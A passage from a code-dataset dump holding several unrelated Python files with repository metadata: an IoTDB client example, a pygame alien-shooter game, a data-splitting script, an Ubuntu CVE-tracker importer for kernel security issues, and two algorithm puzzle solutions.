10, 100, 1000, 10000], np.dtype(\">i4\")),\n np.array([1, 11, 111, 1111, 11111], np.dtype(\">i8\")),\n np.array([1.1, 1.25, 188.1, 0, 8.999], np.dtype(\">f4\")),\n np.array([10011.1, 101.0, 688.25, 6.25, 8, 776], np.dtype(\">f8\")),\n np.array([\"test09\", \"test08\", \"test07\", \"test06\", \"test05\"]),\n]\nnp_timestamps_unsorted = np.array([9, 8, 7, 6, 5], np.dtype(\">i8\"))\nnp_tablet_unsorted = NumpyTablet(\n \"root.sg_test_01.d_02\",\n measurements_,\n data_types_,\n np_values_unsorted,\n np_timestamps_unsorted,\n)\n\n# insert one numpy tablet into the 
database.\nnp_values_ = [\n np.array([False, True, False, True], TSDataType.BOOLEAN.np_dtype()),\n np.array([10, 100, 100, 0], TSDataType.INT32.np_dtype()),\n np.array([11, 11111, 1, 0], TSDataType.INT64.np_dtype()),\n np.array([1.1, 1.25, 188.1, 0], TSDataType.FLOAT.np_dtype()),\n np.array([10011.1, 101.0, 688.25, 6.25], TSDataType.DOUBLE.np_dtype()),\n np.array([\"test01\", \"test02\", \"test03\", \"test04\"]),\n]\nnp_timestamps_ = np.array([98, 99, 100, 101], TSDataType.INT64.np_dtype())\nnp_bitmaps_ = []\nfor i in range(len(measurements_)):\n np_bitmaps_.append(BitMap(len(np_timestamps_)))\nnp_bitmaps_[0].mark(0)\nnp_bitmaps_[1].mark(1)\nnp_bitmaps_[2].mark(2)\nnp_bitmaps_[4].mark(3)\nnp_bitmaps_[5].mark(3)\nnp_tablet_with_none = NumpyTablet(\n \"root.sg_test_01.d_02\",\n measurements_,\n data_types_,\n np_values_,\n np_timestamps_,\n np_bitmaps_,\n)\nsession.insert_tablet(np_tablet_with_none)\n\n\nsession.insert_tablet(np_tablet_unsorted)\nprint(np_tablet_unsorted.get_timestamps())\nfor value in np_tablet_unsorted.get_values():\n print(value)\n\n# insert multiple tablets into database\ntablet_01 = Tablet(\n \"root.sg_test_01.d_01\", measurements_, data_types_, values_, [8, 9, 10, 11]\n)\ntablet_02 = Tablet(\n \"root.sg_test_01.d_01\", measurements_, data_types_, values_, [12, 13, 14, 15]\n)\nsession.insert_tablets([tablet_01, tablet_02])\n\n# insert one tablet with empty cells into the database.\nvalues_ = [\n [None, 10, 11, 1.1, 10011.1, \"test01\"],\n [True, None, 11111, 1.25, 101.0, \"test02\"],\n [False, 100, 1, None, 688.25, \"test03\"],\n [True, 0, 0, 0, 6.25, None],\n] # Non-ASCII text will cause error since bytes can only hold 0-128 nums.\ntimestamps_ = [16, 17, 18, 19]\ntablet_ = Tablet(\n \"root.sg_test_01.d_01\", measurements_, data_types_, values_, timestamps_\n)\nsession.insert_tablet(tablet_)\n\n# insert records of one device\ntime_list = [1, 2, 3]\nmeasurements_list = [\n [\"s_01\", \"s_02\", \"s_03\"],\n [\"s_01\", \"s_02\", \"s_03\"],\n [\"s_01\", \"s_02\", \"s_03\"],\n]\ndata_types_list = [\n [TSDataType.BOOLEAN, TSDataType.INT32, TSDataType.INT64],\n [TSDataType.BOOLEAN, TSDataType.INT32, TSDataType.INT64],\n [TSDataType.BOOLEAN, TSDataType.INT32, TSDataType.INT64],\n]\nvalues_list = [[False, 22, 33], [True, 1, 23], [False, 15, 26]]\n\nsession.insert_records_of_one_device(\n \"root.sg_test_01.d_01\", time_list, measurements_list, data_types_list, values_list\n)\n\n# execute non-query sql statement\nsession.execute_non_query_statement(\n \"insert into root.sg_test_01.d_01(timestamp, s_02) values(16, 188)\"\n)\n\n# execute sql query statement\nwith session.execute_query_statement(\n \"select * from root.sg_test_01.d_01\"\n) as session_data_set:\n session_data_set.set_fetch_size(1024)\n while session_data_set.has_next():\n print(session_data_set.next())\n# execute sql query statement\nwith session.execute_query_statement(\n \"select s_01, s_02, s_03, s_04, s_05, s_06 from root.sg_test_01.d_02\"\n) as session_data_set:\n session_data_set.set_fetch_size(1024)\n while session_data_set.has_next():\n print(session_data_set.next())\n\n# execute statement\nwith session.execute_statement(\n \"select * from root.sg_test_01.d_01\"\n) as session_data_set:\n while session_data_set.has_next():\n print(session_data_set.next())\n\nsession.execute_statement(\n \"insert into root.sg_test_01.d_01(timestamp, s_02) values(16, 188)\"\n)\n\n# insert string records of one device\ntime_list = [1, 2, 3]\nmeasurements_list = [\n [\"s_01\", \"s_02\", \"s_03\"],\n [\"s_01\", \"s_02\", 
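The bitmap example in this record marks individual rows of individual columns as null before inserting the tablet. A sketch that generalizes the pattern, assuming (as the record suggests) that `BitMap.mark(i)` flags row `i` of that column as null and the placed value is ignored by the server:

```python
import numpy as np
from iotdb.utils.BitMap import BitMap

# Sketch: turn rows containing None into dense columns plus
# one per-column BitMap of null positions.
def columns_with_nulls(rows, dtypes, fill=0):
    n = len(rows)
    cols, bitmaps = [], []
    for c, dt in enumerate(dtypes):
        bm = BitMap(n)
        col = []
        for r in range(n):
            v = rows[r][c]
            if v is None:
                bm.mark(r)   # row r of this column is null
                v = fill     # placeholder value, assumed ignored
            col.append(v)
        cols.append(np.array(col, dt))
        bitmaps.append(bm)
    return cols, bitmaps
```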
\"s_03\"],\n [\"s_01\", \"s_02\", \"s_03\"],\n]\nvalues_list = [[\"False\", \"22\", \"33\"], [\"True\", \"1\", \"23\"], [\"False\", \"15\", \"26\"]]\n\nsession.insert_string_records_of_one_device(\n \"root.sg_test_01.d_03\",\n time_list,\n measurements_list,\n values_list,\n)\n\nwith session.execute_raw_data_query(\n [\"root.sg_test_01.d_03.s_01\", \"root.sg_test_01.d_03.s_02\"], 1, 4\n) as session_data_set:\n session_data_set.set_fetch_size(1024)\n while session_data_set.has_next():\n print(session_data_set.next())\n\nwith session.execute_last_data_query(\n [\"root.sg_test_01.d_03.s_01\", \"root.sg_test_01.d_03.s_02\"], 0\n) as session_data_set:\n session_data_set.set_fetch_size(1024)\n while session_data_set.has_next():\n print(session_data_set.next())\n\n# delete database\nsession.delete_storage_group(\"root.sg_test_01\")\n\n# create template\ntemplate = Template(name=\"template_python\", share_time=False)\nm_node_1 = MeasurementNode(\n name=\"s1\",\n data_type=TSDataType.INT64,\n encoding=TSEncoding.RLE,\n compression_type=Compressor.SNAPPY,\n)\nm_node_2 = MeasurementNode(\n name=\"s2\",\n data_type=TSDataType.INT64,\n encoding=TSEncoding.RLE,\n compression_type=Compressor.SNAPPY,\n)\nm_node_3 = MeasurementNode(\n name=\"s3\",\n data_type=TSDataType.INT64,\n encoding=TSEncoding.RLE,\n compression_type=Compressor.SNAPPY,\n)\ntemplate.add_template(m_node_1)\ntemplate.add_template(m_node_2)\ntemplate.add_template(m_node_3)\nsession.create_schema_template(template)\nprint(\"create template success template_python\")\n\n# close session connection.\nsession.close()\n\nprint(\"All executions done!!\")\n","repo_name":"apache/iotdb","sub_path":"iotdb-client/client-py/SessionExample.py","file_name":"SessionExample.py","file_ext":"py","file_size_in_byte":11809,"program_lang":"python","lang":"en","doc_type":"code","stars":4073,"dataset":"github-code","pt":"40"} +{"seq_id":"5545556909","text":"import sys\nfrom time import sleep\n\nimport pygame\n\nfrom bullet import Bullet\nfrom alien import Alien\n\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\n \"\"\"响应按键。\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n ship.moving_left = True\n elif event.key == pygame.K_SPACE:\n fire_bullet(ai_settings, screen, ship, bullets)\n elif event.key == pygame.K_q:\n sys.exit()\n \ndef check_keyup_events(event, ship):\n \"\"\"响应密钥释放。\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\n\ndef check_events(ai_settings, screen, stats, sb, play_button, ship, aliens,\n bullets):\n \"\"\"响应按键和鼠标事件.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_play_button(ai_settings, screen, stats, sb, play_button,\n ship, aliens, bullets, mouse_x, mouse_y)\n \ndef check_play_button(ai_settings, screen, stats, sb, play_button, ship,\n aliens, bullets, mouse_x, mouse_y):\n \"\"\"当玩家点击Play时开始一个新游戏.\"\"\"\n button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\n if button_clicked and not stats.game_active:\n # 重置游戏设置.\n ai_settings.initialize_dynamic_settings()\n \n # 隐藏鼠标光标。\n pygame.mouse.set_visible(False)\n \n # 重置游戏统计\n stats.reset_stats()\n stats.game_active = True\n 
\n # 重置记分牌图像.\n sb.prep_score()\n sb.prep_high_score()\n sb.prep_level()\n sb.prep_ships()\n \n # 清空外星人和子弹的名单\n aliens.empty()\n bullets.empty()\n \n # 创建一个新的舰队和中心的船.\n create_fleet(ai_settings, screen, ship, aliens)\n ship.center_ship()\n\ndef fire_bullet(ai_settings, screen, ship, bullets):\n \"\"\"如果还没有达到极限,就发射一颗子弹.\"\"\"\n # 创建一个新的项目符号,添加到项目符号组.\n if len(bullets) < ai_settings.bullets_allowed:\n new_bullet = Bullet(ai_settings, screen, ship)\n bullets.add(new_bullet)\n\ndef update_screen(ai_settings, screen, stats, sb, ship, aliens, bullets,\n play_button):\n \"\"\"更新屏幕上的图像,然后切换到新屏幕.\"\"\"\n # 重新绘制屏幕,每个都经过循环。\n screen.fill(ai_settings.bg_color)\n \n # 重画飞船和外星人后面的所有子弹。\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n ship.blitme()\n aliens.draw(screen)\n \n #绘制分数信息。\n sb.show_score()\n \n # 如果游戏处于非活动状态,绘制播放按钮\n if not stats.game_active:\n play_button.draw_button()\n\n # 使最近绘制的屏幕可见。\n pygame.display.flip()\n \ndef update_bullets(ai_settings, screen, stats, sb, ship, aliens, bullets):\n \"\"\"更新子弹位置,清除旧子弹。\"\"\"\n # 更新子弹的位置。\n bullets.update()\n\n # 扔掉已经消失的子弹。\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n \n check_bullet_alien_collisions(ai_settings, screen, stats, sb, ship,\n aliens, bullets)\n \ndef check_high_score(stats, sb):\n \"\"\"看看有没有新的高分。\"\"\"\n if stats.score > stats.high_score:\n stats.high_score = stats.score\n sb.prep_high_score()\n \ndef check_bullet_alien_collisions(ai_settings, screen, stats, sb, ship,\n aliens, bullets):\n \"\"\"对子弹与外星人的碰撞作出反应。\"\"\"\n # 清除所有相撞的子弹和外星人。\n collisions = pygame.sprite.groupcollide(bullets, aliens, True, True)\n \n if collisions:\n for aliens in collisions.values():\n stats.score += ai_settings.alien_points * len(aliens)\n sb.prep_score()\n check_high_score(stats, sb)\n \n if len(aliens) == 0:\n #如果整个舰队被摧毁,开始一个新的等级。\n bullets.empty()\n ai_settings.increase_speed()\n \n # 提高等级。\n stats.level += 1\n sb.prep_level()\n \n create_fleet(ai_settings, screen, ship, aliens)\n \ndef check_fleet_edges(ai_settings, aliens):\n \"\"\"如果有外星人到达边缘,请适当回应.\"\"\"\n for alien in aliens.sprites():\n if alien.check_edges():\n change_fleet_direction(ai_settings, aliens)\n break\n \ndef change_fleet_direction(ai_settings, aliens):\n \"\"\"放下整个舰队,改变舰队的方向.\"\"\"\n for alien in aliens.sprites():\n alien.rect.y += ai_settings.fleet_drop_speed\n ai_settings.fleet_direction *= -1\n \ndef ship_hit(ai_settings, screen, stats, sb, ship, aliens, bullets):\n \"\"\"回应被外星人击中的飞船。\"\"\"\n if stats.ships_left > 0:\n # 减量ships_left.\n stats.ships_left -= 1\n \n # 更新积分\n sb.prep_ships()\n \n else:\n stats.game_active = False\n pygame.mouse.set_visible(True)\n \n #清空外星人和子弹的名单。\n aliens.empty()\n bullets.empty()\n \n # 创建一个新的舰队,并集中船。\n create_fleet(ai_settings, screen, ship, aliens)\n ship.center_ship()\n \n # 停止\n sleep(0.5)\n \ndef check_aliens_bottom(ai_settings, screen, stats, sb, ship, aliens,\n bullets):\n \"\"\"检查是否有外星人到达屏幕底部。\"\"\"\n screen_rect = screen.get_rect()\n for alien in aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n # 就像船被撞了一样。\n ship_hit(ai_settings, screen, stats, sb, ship, aliens, bullets)\n break\n \ndef update_aliens(ai_settings, screen, stats, sb, ship, aliens, bullets):\n \"\"\"\n 检查舰队是否在边缘,\n\n然后更新舰队中所有外星人的位置。\n \"\"\"\n check_fleet_edges(ai_settings, aliens)\n aliens.update()\n \n # 寻找与外星人的碰撞。\n if pygame.sprite.spritecollideany(ship, aliens):\n ship_hit(ai_settings, screen, stats, sb, ship, aliens, bullets)\n\n #寻找撞击屏幕底部的外星人。\n check_aliens_bottom(ai_settings, screen, stats, sb, ship, 
aliens, bullets)\n \ndef get_number_aliens_x(ai_settings, alien_width):\n \"\"\"确定适合一行的外星人的数量。\"\"\"\n available_space_x = ai_settings.screen_width - 2 * alien_width\n number_aliens_x = int(available_space_x / (2 * alien_width))\n return number_aliens_x\n \ndef get_number_rows(ai_settings, ship_height, alien_height):\n \"\"\"确定适合屏幕的外星人的行数。\"\"\"\n available_space_y = (ai_settings.screen_height -\n (3 * alien_height) - ship_height)\n number_rows = int(available_space_y / (2 * alien_height))\n return number_rows\n \ndef create_alien(ai_settings, screen, aliens, alien_number, row_number):\n \"\"\"创建一个外星人,并将其放置在行中。\"\"\"\n alien = Alien(ai_settings, screen)\n alien_width = alien.rect.width\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n aliens.add(alien)\n\ndef create_fleet(ai_settings, screen, ship, aliens):\n \"\"\"创造一个完整的外星人舰队.\"\"\"\n # 创建一个外星人,并在一行中找到外星人的数量。\n alien = Alien(ai_settings, screen)\n number_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\n number_rows = get_number_rows(ai_settings, ship.rect.height,\n alien.rect.height)\n \n # 创造外星人舰队。\n for row_number in range(number_rows):\n for alien_number in range(number_aliens_x):\n create_alien(ai_settings, screen, aliens, alien_number,\n row_number)\n","repo_name":"OliviaBieber/-","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":8364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1438042579","text":"# -*- coding = utf-8 -*-\n# 2023/3/8 22:58\nimport os, random\n\n# 合并所有数据到一个文件\ndef merge_files(filedir, fileout):\n with open(fileout, \"w\", encoding=\"UTF-8\") as f1:\n for filename in os.listdir(filedir):\n path = os.path.join(filedir, filename)\n if os.path.isfile(path): # 判断是否是文件还是目录需要用绝对路径\n with open(path, \"r\", encoding=\"UTF-8\") as f2:\n lines = f2.readlines()\n f1.write(\"\".join(lines))\n\n\n# 先分为训练集和测试集,再从训练集分出验证集\ndef split_ratio(fileall, filefir, fileother, fir_ratio, other_ratio):\n with open(fileall, \"r\", encoding=\"UTF-8\") as f:\n lines = f.readlines()\n n_total = len(lines) # 获取数据集的总长度\n\n fir_offset = int(n_total * fir_ratio)\n other_offset = int(n_total * (fir_ratio + other_ratio))\n random.shuffle(lines) # 按行打乱顺序\n fir_data = open(filefir, 'w', encoding=\"UTF-8\")\n other_data = open(fileother, 'w', encoding=\"UTF-8\")\n\n # 写入文件\n for i, line in enumerate(lines):\n if i < fir_offset:\n fir_data.write(line)\n elif i < other_offset:\n other_data.write(line)\n\n fir_data.close()\n other_data.close()\n\n\ndef split_num(fileall, filefir, fileother, other_num):\n with open(fileall, \"r\", encoding=\"UTF-8\") as f:\n lines = f.readlines()\n n_total = len(lines) # 获取数据集的总长度\n\n random.shuffle(lines) # 按行打乱顺序\n fir_data = open(filefir, 'w', encoding=\"UTF-8\")\n other_data = open(fileother, 'w', encoding=\"UTF-8\")\n\n # 写入文件\n for i, line in enumerate(lines):\n if i < other_num:\n other_data.write(line)\n elif i < n_total:\n fir_data.write(line)\n\n fir_data.close()\n other_data.close()\n\n\nif __name__ == '__main__':\n merge_files(\"../cache/data_class\", \"../message/data/all_data.txt\")\n # 将这些数据按照 8:2 的比例划分为训练集和测试集,再从划分出来的训练 集中按照 9:1 的比例划分为训练集和验证集\n # split(\"../data/all_data.txt\", \"../data/train_dev.txt\", \"../data/test.txt\", 0.8, 0.2)\n # split(\"../data/train_dev.txt\", \"../data/train.txt\", \"../data/dev.txt\", 0.9, 0.1)\n # 将数据按照测试集3000验证集1500划分\n 
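Because `split_ratio` and `split_num` shuffle with an unseeded `random.shuffle`, every run produces a different train/test partition. A small seeded variant for reproducibility; the function name `split_num_seeded` and the default seed are illustrative, not from the record:

```python
import random

# Sketch: same behaviour as split_num, but a fixed seed makes the
# partition reproducible across runs.
def split_num_seeded(fileall, filefir, fileother, other_num, seed=42):
    with open(fileall, "r", encoding="UTF-8") as f:
        lines = f.readlines()
    random.Random(seed).shuffle(lines)  # deterministic shuffle
    with open(fileother, "w", encoding="UTF-8") as other_data:
        other_data.writelines(lines[:other_num])
    with open(filefir, "w", encoding="UTF-8") as fir_data:
        fir_data.writelines(lines[other_num:])
```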
split_num(\"../message/data/all_data.txt\", \"../message/data/train_dev.txt\", \"../message/data/test.txt\", 3000)\n split_num(\"../message/data/train_dev.txt\", \"../message/data/train.txt\", \"../message/data/dev.txt\", 1500)\n","repo_name":"ttingCui/Fraud_classify","sub_path":"dataprocess/divide_file.py","file_name":"divide_file.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20842166650","text":"import datetime\nimport glob\nimport os\nimport os.path\nimport re\nimport subprocess\nimport sys\n\nimport kernel_sec.issue\n\nIMPORT_DIR = 'import/ubuntu'\n\nBREAK_FIX_RE = re.compile(r'^break-fix: (?:([0-9a-f]{40})|[-\\w]+)'\n r' (?:([0-9a-f]{40})|[-\\w]+)$')\nDISCOVERED_BY_SEP_RE = re.compile(r'(?:,\\s*(?:and\\s+)?|\\s+and\\s+)')\nCOMMENT_RE = re.compile(r'^(\\w+)>\\s+(.*)$')\nDESCRIPTION_ANDROID_RE = re.compile(r'\\bAndroid\\b')\n\n# Based on load_cve() in scripts/cve_lib.py\ndef load_cve(cve, strict=False):\n '''Loads a given CVE into:\n dict( fields...\n 'pkgs' -> dict( pkg -> dict( release -> (state, notes) ) )\n )\n '''\n\n EXIT_FAIL = 1\n EXIT_OKAY = 0\n\n msg = ''\n code = EXIT_OKAY\n\n data = dict()\n data.setdefault('tags',dict())\n affected = dict()\n lastfield = None\n fields_seen = []\n\n for line in cve:\n line = line.rstrip()\n\n # Ignore blank/commented lines\n if len(line) == 0 or line.startswith('#'):\n continue\n if line.startswith(' '):\n try:\n data[lastfield] += '\\n%s' % (line[1:])\n except KeyError as e:\n msg += \"%s: bad line '%s' (%s)\\n\" % (cve, line, e)\n code = EXIT_FAIL\n continue\n\n try:\n field, value = line.split(':',1)\n except ValueError as e:\n msg += \"%s: bad line '%s' (%s)\\n\" % (cve, line, e)\n code = EXIT_FAIL\n continue\n\n lastfield = field = field.strip()\n if field in fields_seen:\n msg += \"%s: repeated field '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n else:\n fields_seen.append(field)\n value = value.strip()\n if field == 'Candidate':\n data.setdefault(field,value)\n if value != \"\" and not value.startswith('CVE-') and not value.startswith('UEM-') and not value.startswith('EMB-'):\n msg += \"%s: unknown Candidate '%s' (must be /(CVE|UEM|EMB)-/)\\n\" % (cve, value)\n code = EXIT_FAIL\n elif 'Priority' in field:\n # For now, throw away comments on Priority fields\n if ' ' in value:\n value = value.split()[0]\n if 'Priority_' in field:\n try:\n foo, pkg = field.split('_',1)\n except ValueError:\n msg += \"%s: bad field with 'Priority_': '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n continue\n data.setdefault(field,value)\n elif 'Patches_' in field:\n '''These are raw fields'''\n try:\n foo, pkg = field.split('_',1)\n except ValueError:\n msg += \"%s: bad field with 'Patches_': '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n continue\n data.setdefault(field,value)\n elif 'Tags_' in field:\n '''These are processed into the \"tags\" hash'''\n try:\n foo, pkg = field.split('_',1)\n except ValueError:\n msg += \"%s: bad field with 'Tags_': '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n continue\n data['tags'].setdefault(pkg, set())\n for word in value.strip().split(' '):\n data['tags'][pkg].add(word)\n elif '_' in field:\n try:\n release, pkg = field.split('_',1)\n except ValueError:\n msg += \"%s: bad field with '_': '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n continue\n try:\n info = value.split(' ',1)\n except ValueError:\n msg += \"%s: missing state for '%s': '%s'\\n\" % (cve, field, value)\n code = EXIT_FAIL\n continue\n state = 
info[0]\n if state == '':\n state = 'needs-triage'\n\n if len(info) < 2:\n notes = \"\"\n else:\n notes = info[1].strip()\n if notes.startswith('('):\n notes = notes[1:]\n if notes.endswith(')'):\n notes = notes[:-1]\n\n # Work-around for old-style of only recording released versions\n if notes == '' and state[0] in ('0123456789'):\n notes = state\n state = 'released'\n\n if state not in ['needs-triage','needed','active','pending','released','deferred','DNE','ignored','not-affected']:\n msg += \"%s: %s_%s has unknown state: '%s'\\n\" % (cve, release, pkg, state)\n code = EXIT_FAIL\n\n # Verify \"released\" kernels have version notes\n #if state == 'released' and pkg in kernel_srcs and notes == '':\n # msg += \"%s: %s_%s has state '%s' but lacks version note\\n\" % (cve, release, pkg, state)\n # code = EXIT_FAIL\n\n # Verify \"active\" states have an Assignee\n if state == 'active' and data['Assigned-to'].strip() == \"\":\n msg += \"%s: %s_%s has state '%s' but lacks 'Assigned-to'\\n\" % (cve, release, pkg, state)\n code = EXIT_FAIL\n\n affected.setdefault(pkg,dict())\n affected[pkg].setdefault(release,[state,notes])\n elif field not in ['References', 'Description', 'Ubuntu-Description', 'Notes', 'Bugs', 'Assigned-to', 'Approved-by', 'PublicDate', 'PublicDateAtUSN', 'CRD', 'Discovered-by']:\n msg += \"%s: unknown field '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n else:\n data.setdefault(field,value)\n\n # Check for required fields\n for field in ['Candidate','PublicDate','Description']:\n if field not in data:\n msg += \"%s: missing field '%s'\\n\" % (cve, field)\n code = EXIT_FAIL\n nonempty = ['Candidate']\n if strict:\n nonempty += ['PublicDate']\n if field in nonempty and data[field].strip() == \"\":\n msg += \"%s: required field '%s' is empty\\n\" % (cve, field)\n code = EXIT_FAIL\n\n # Fill in defaults for missing fields\n if 'Priority' not in data:\n data.setdefault('Priority','untriaged')\n # Perform override fields\n if 'PublicDateAtUSN' in data:\n data['PublicDate'] = data['PublicDateAtUSN']\n if 'CRD' in data and data['PublicDate'] != data['CRD']:\n data['PublicDate'] = data['CRD']\n\n data['pkgs'] = affected\n\n if code != EXIT_OKAY:\n raise ValueError(msg.strip())\n return data\n\nclass NonKernelIssue(Exception):\n pass\n\ndef load_ubuntu_issue(f):\n ubu_issue = load_cve(f)\n issue = {}\n\n assert ubu_issue['Candidate'] == os.path.basename(f.name)\n\n if 'linux' not in ubu_issue['pkgs']:\n raise NonKernelIssue()\n\n # Issues with Android in the description almost always refer to things\n # not in mainline, that we should not track\n if DESCRIPTION_ANDROID_RE.search(ubu_issue['Description']):\n raise NonKernelIssue()\n\n issue['description'] = ubu_issue['Description'].strip()\n\n refs = [ref for ref in\n (ubu_issue.get('References', '').strip().split() +\n ubu_issue.get('Bugs', '').strip().split())\n if ':' in ref]\n if refs:\n issue['references'] = refs\n\n comments = {}\n name = 'Ubuntu'\n for line in ubu_issue['Notes'].split('\\n'):\n if not line:\n continue\n match = COMMENT_RE.match(line)\n if match:\n name = 'Ubuntu-' + match.group(1)\n rest = match.group(2)\n else:\n rest = line\n comments.setdefault(name, []).append(rest)\n if comments:\n issue['comments'] = dict((name, '\\n'.join(lines))\n for (name, lines) in comments.items())\n\n disc = ubu_issue.get('Discovered-by', '').strip()\n if disc:\n issue['reporters'] = DISCOVERED_BY_SEP_RE.split(disc)\n\n patches = ubu_issue.get('Patches_linux', '').strip()\n match = BREAK_FIX_RE.match(patches)\n if match and 
match.group(1):\n issue.setdefault('introduced-by', {})['mainline'] = [match.group(1)]\n if match and match.group(2):\n issue.setdefault('fixed-by', {})['mainline'] = [match.group(2)]\n\n return issue\n\n# Ubuntu doesn't seem to retire issues any more, so only include issues\n# that are active and discovered either this year or last year\ndef get_recent_issues():\n this_year = datetime.datetime.utcnow().year\n for filename in glob.glob(IMPORT_DIR + '/active/CVE-*'):\n cve_id = os.path.basename(filename)\n year = int(cve_id.split('-')[1])\n if year >= this_year - 1:\n yield (cve_id, filename)\n\ndef main():\n os.makedirs(IMPORT_DIR, 0o777, exist_ok=True)\n if os.path.isdir(IMPORT_DIR + '/.bzr'):\n subprocess.check_call(['bzr', 'update'], cwd=IMPORT_DIR)\n else:\n subprocess.check_call(['bzr', 'checkout', 'lp:ubuntu-cve-tracker', '.'],\n cwd=IMPORT_DIR)\n\n our_issues = set(kernel_sec.issue.get_list())\n their_issues = dict(get_recent_issues())\n\n # Also look at any older issues that we already track\n for cve_id in our_issues:\n if cve_id not in their_issues:\n for state in ['active', 'ignored', 'retired']:\n their_filename = IMPORT_DIR + '/' + state + '/' + cve_id\n if os.path.exists(their_filename):\n their_issues[cve_id] = their_filename\n\n for cve_id in their_issues:\n their_filename = their_issues[cve_id]\n with open(their_filename, encoding='utf-8') as f:\n try:\n theirs = load_ubuntu_issue(f)\n except NonKernelIssue:\n continue\n except (KeyError, ValueError, UnicodeDecodeError):\n print('Failed to parse %s' % their_filename, file=sys.stderr)\n continue\n\n if cve_id not in our_issues:\n # Copy theirs\n ours = theirs\n else:\n # Merge into ours\n ours = kernel_sec.issue.load(cve_id)\n kernel_sec.issue.validate(ours) # check that it's good to start with\n if not kernel_sec.issue.merge_into(ours, theirs):\n continue\n\n try:\n kernel_sec.issue.validate(ours)\n except ValueError as e:\n print('%s: %s' % (their_filename, e), file=sys.stderr)\n continue\n\n kernel_sec.issue.save(cve_id, ours)\n\nif __name__ == '__main__':\n main()\n","repo_name":"rockyrays/cip-kernel-sec","sub_path":"scripts/import_ubuntu.py","file_name":"import_ubuntu.py","file_ext":"py","file_size_in_byte":10494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35206322891","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def delNodes(self, root: TreeNode, to_delete: List[int]) -> List[TreeNode]:\n \n results = []\n to_delete = set(to_delete)\n \n def backtrack(parent, node, deleted = False):\n # print(node.val, results)\n if not node: # None\n return\n print(node.val, deleted)\n \n if node.val in to_delete:\n if parent is not None:\n parent.left = None if node==parent.left else parent.left\n parent.right = None if node==parent.right else parent.right\n \n print(\"DEL\", node.val)\n print(\"left-d\")\n backtrack(node, node.left, True)\n print(\"right-d\")\n backtrack(node, node.right, True)\n return\n \n elif deleted:\n # print(node.val, node)\n results.append(node)\n print(\"NOT DEL\", node.val)\n print(\"left-nd\")\n backtrack(node, node.left)\n print(\"right-nd\")\n backtrack(node, node.right)\n \n backtrack(None, root, True)\n \n print(results)\n return results\n \n 
","repo_name":"HYUcoolguy/algorithm-study","sub_path":"LeetCode/1110.py","file_name":"1110.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"34064100381","text":"from collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef bfs(board, ice, n, m):\n queue = deque([])\n visit = [[0]*m for _ in range(n)]\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n count = 0\n for ix, iy in ice:\n queue.clear()\n if board[ix][iy] > 0 and visit[ix][iy] == 0:\n start, end = ix, iy\n queue.append((start, end))\n count += 1\n visit[start][end] = count\n while queue:\n x, y = queue.popleft()\n for j in range(4):\n nx, ny = x + dx[j], y + dy[j]\n if not (0 <= nx < n) or not (0 <= ny < m):\n continue\n if board[nx][ny] > 0 and visit[nx][ny] == 0: # 방문했으면\n queue.append((nx, ny))\n visit[nx][ny] = visit[x][y]\n\n return count\n\n\nn, m = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(n)]\nice = []\nfor i in range(n):\n for j in range(m):\n if board[i][j] != 0:\n ice.append((i, j))\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\nanswer = 0\n\nice_minus = [[0]*m for _ in range(n)]\n\nresult = bfs(board, ice, n, m) # 처음부터 두 덩어리 이상인 경우\nif result >= 2:\n print(0)\n exit()\n\ntime = 1\nwhile True:\n for ix, iy in ice:\n if board[ix][iy] == 0:\n continue\n for j in range(4):\n nx, ny = ix + dx[j], iy + dy[j]\n if 0 <= nx < n and 0 <= ny < m and board[nx][ny] <= 0:\n ice_minus[ix][iy] -= 1\n\n for i in range(n):\n for j in range(m):\n if ice_minus[i][j] == 0:\n continue\n tmp = ice_minus[i][j] + board[i][j]\n board[i][j] = 0 if tmp < 0 else tmp\n ice_minus[i][j] = 0\n\n for ix, iy in ice:\n if board[ix][iy] > 0: # 다 녹았다면\n break\n else:\n answer = 0\n break\n\n result = bfs(board, ice, n, m)\n if result >= 2:\n answer = time\n break\n time += 